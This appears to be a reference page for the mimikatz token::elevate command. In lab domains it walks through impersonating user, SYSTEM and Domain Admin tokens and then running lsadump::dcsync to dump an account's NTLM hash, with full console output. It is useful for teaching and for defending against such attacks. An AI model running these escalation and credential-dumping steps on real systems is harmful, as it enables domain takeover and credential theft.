Links

elevate

token::elevate can be used to impersonate a token. By default it will impersonate a token from SYSTEM and therefore elevate permissions to NT AUTHORITY\SYSTEM.
It has the following command line arguments:
  • /id: Impersonate the specified token
  • /process: Impersonate the token of the running process
  • /user: Impersonate the token of the specified user
  • /admin: Impersonate a token of builtin local administrators
  • /domainadmin: Impersonate a token with Domain Admin privileges
  • /enterpriseadmin: Impersonate a token with Enterprise Admin privileges
  • /localservice: NT AUTHORITY\LOCAL SERVICE token impersonation
  • /networkservice: NT AUTHORITY\NETWORK SERVICE token impersonation
Impersonated tokens will be impersonation tokens (thread tokens) and only work in threads. To impersonate a token in a new process, use token::run.

Impersonate Token in a New Thread

List current token:
mimikatz # token::whoami
* Process Token : {0;000831c5} 3 F 2396391 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary
* Thread Token : no token
The output shows:
  • The primary (process) token belongs to the current user.
  • There is no impersonation (thread) token.
List tokens of user to impersonate:
mimikatz # token::list /user:ffast
Token Id : 0
User name : ffast
SID name :
5332 {0;000563b2} 2 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
4432 {0;000563b2} 2 F 2839551 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
668 {0;00050574} 0 D 329079 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (12g,24p) Impersonation (Impersonation)
668 {0;000563e4} 2 L 353269 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
800 {0;000563e4} 2 L 456098 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
920 {0;000563e4} 2 L 380750 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
920 {0;000563e4} 2 L 387116 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,01p) Impersonation (Identification)
920 {0;000563e4} 2 L 436160 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
[...]
Use a primary token of the target user (one that is linked to a logonsession):
mimikatz # token::elevate /id:457263
Token Id : 457263
User name :
SID name :
5332 {0;000563b2} 2 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
-> Impersonated !
* Process Token : {0;000831c5} 3 F 2396391 SERVER01\tmassie S-1-5-21-755659916-1915924768-2761631771-1001 (15g,24p) Primary
* Thread Token : {0;000563b2} 2 F 3874634 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Impersonation (Delegation)
The output shows:
  • The primary (process) token is still the same of the initial user. The token::elevate command will not change the primary token.
  • There is now a new impersonation (thread) token for the impersonated user. The impersonation level is delegation. It's therefore possible to use the token in a new thread and access local and remote resources.
  • It's not possible to start a new command (misc::cmd) as the impersonated user, because the impersonated token is an impersonation token and no process token. To impersonate a token in a new process, use token::run.
  • All mimikatz commands are now using the impersonation token for new threads.
After impersonating the user (who is domain admin), it's e.g. possible to use lsadump::dcsync:
mimikatz # lsadump::dcsync /user:cclear
[DC] 'winattacklab.local' will be the domain
[DC] 'DC1.winattacklab.local' will be the DC server
[DC] 'cclear' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Celaine Clear
** SAM ACCOUNT **
SAM Username : cclear
User Principal Name : [email protected]
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 5/31/2023 6:51:25 AM
Object Security ID : S-1-5-21-1345929560-157546789-2569868433-1117
Object Relative ID : 1117
Credentials:
Hash NTLM: 760ca1371ac4c506d31b5ec1a09f806d
[...]

Other Examples

By default, token::elevate elevates to SYSTEM:
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
752 {0;000003e7} 0 D 44299 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
-> Impersonated !
* Process Token : {0;002cfce0} 4 F 62374281 hacklab\m3g9tr0n S-1-5-21-2725560159-1428537199-2260736313-1730 (13g,24p) Primary
* Thread Token : {0;000003e7} 0 D 62721950 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Impersonation (Delegation)
  • All mimikatz commands (new threads) are therefore executed as SYSTEM.
Elevate to any logged in domain admin:
mimikatz # token::elevate /domainadmin
Token Id : 0
User name :
SID name : hacklab\Domain Admins
4512 {0;0007212c} 2 D 476947 hacklab\Administrator S-1-5-21-2725560159-1428537199-2260736313-500 (29g,26p) Primary
-> Impersonated !
* Process Token : {0;080fd6c8} 3 F 137701065 hacklab\m3g9tr0n S-1-5-21-2725560159-1428537199-2260736313-1730
(15g,26p) Primary
* Thread Token : {0;0007212c} 2 D 137785083 hacklab\Administrator S-1-5-21-2725560159-1428537199-2260736313-500
(29g,26p) Impersonation (Delegation)
Last modified 5mo ago